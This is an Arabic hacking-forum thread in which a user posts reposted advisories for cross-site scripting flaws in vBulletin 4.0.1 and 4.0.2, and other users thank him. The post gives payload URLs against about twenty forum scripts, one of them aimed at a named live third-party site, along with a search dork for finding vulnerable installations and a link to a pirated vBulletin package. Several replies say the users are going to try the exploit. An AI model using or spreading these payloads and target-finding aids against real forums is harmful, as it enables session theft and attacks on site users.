تغرتين في منتديات النسخة vb 4.0.x

Zero · 03-24-2010, 05:18 AM

بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين
السلام عليكم ورحمة الله وبركاته

اليكم التغرات

كود PHP:


			
===================================

vBulletin v 4.0.1 XSS Vulnerability

===================================



[+] Script: vBulletin Version 4.0.1

[+] Vendor: www.vbulletin.com

[+] Author: W4n73d



[~] Bug: Cross Site Scripting (XSS)

[~] Exploit: http://[HOST]/forum/calendar.php="***************("! XSS

!");</script>

[~] Demo: http://www.overbr.com.br/forum/calendar.php="***************("! XSS

!");</script>







# Inj3ct0r.com [2010-02-15]

كود PHP:


			
==========================================

vBulletin  Version 4.0.2 Xss Vulnerability

==========================================



========================================================================================                  

| # Title    : vBulletin  Version 4.0.2 Cross Site Scripting in URI Vulnerability      

| # Author   : indoushka                                                                                                 

| # Web Site : http://www.digzip.com/files/54QE0JXS/vbulletin_4.0.2nulledfinal.rar                                                     

| # Dork     : Powered by vBulletin? Version 4.0.2                                                                                                              

| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       

| # Bug      : XSS                                                                     

======================      Exploit By indoushka       =================================

# Exploit  :  

 

http://127.0.0.1/upload/calendar.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/faq.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/forum.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/usercp.php/>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/subscription.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/showthread.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/showgroups.php/>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/sendmessage.php/>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/search.php/>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/register.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/profile.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/private.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/online.php/>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/newthread.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/misc.php/>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/memberlist.php?=>"'>***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/member.php/>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/inlinemod.php?acuparam=>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/index.php/>">***************(213771818860)</ScRiPt>



http://127.0.0.1/upload/forumdisplay.php?acuparam=>">***************(213771818860)</ScRiPt>







# Inj3ct0r.com [2010-02-20]

قريبا درس استغلال تغرات Xss

synyster-hacker · 03-24-2010, 05:30 AM

الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين موفق بإذن الله ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . ألف مبروك .. لقد سعدت بهذا الخبر

][آلـهـٍيـكَـل آلأزٍرٍقٌ][ · 03-24-2010, 05:58 AM

Zero

شكرا لك ياغالي

نزلت الثغرة في مواقع السيكيوريتي

لكن اهملتها

ان شاء الله بجربهاا

دمت بود

جــاري تجربتهـا

Cyber Code · 03-24-2010, 06:27 AM

مشكوور اخي , جاري التجريب في اقرب وقت ان شاء الله

SoLiTair4Ever · 03-28-2010, 05:39 AM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

Dr.NaNo · 03-29-2010, 02:14 AM

مشكور اخي على الثغره بس هذي الثعره صعبه شوي بس سهله للي محترف ..

تحياتي لك

CrAzy-HaCkEr · 03-29-2010, 02:57 AM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

M!M0 · 04-06-2010, 01:53 AM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

ثغرة جيدة

abdolkadr · 06-11-2010, 09:54 AM

مبدع جدا جزاك الله خير اخي الغالي

DR-HEX · 06-11-2010, 01:01 PM

[align=center]شكرااااا اخي[/align]

HaKoReY · 06-11-2010, 03:03 PM

[align=center]عـــأشت ألآيادي حبيبي زيرو تقبل مروري وردة وان شاء الله انشوف ابداع منك جميل [/align]

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
ثغرة XSS في منتديات vb النسخة.0.2 4	Zero	حقن xss - ssi	17	12-09-2018 02:25 AM
شرح ثغرتين على الميتاسبلوت مع الاساسيات في metasploit gui	ابو بدر	جـــ'ابات العناكــ'ب	9	02-18-2012 02:54 PM
اختراق منتديات النسخة vb4.0	Zero	Hackers Showoff	5	03-22-2010 04:11 AM
[تعريب] : اللغة العربية الخاصة بـ منتديات الفي بولتن vBulletin النسخة 3.8.4	xman2	قســم تطويــر المــــواقع	0	10-07-2009 08:33 AM
الان طريقة اختراق منتديات vb النسخة 3.5.0	AbO-Ra3d	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	4	11-01-2008 02:07 AM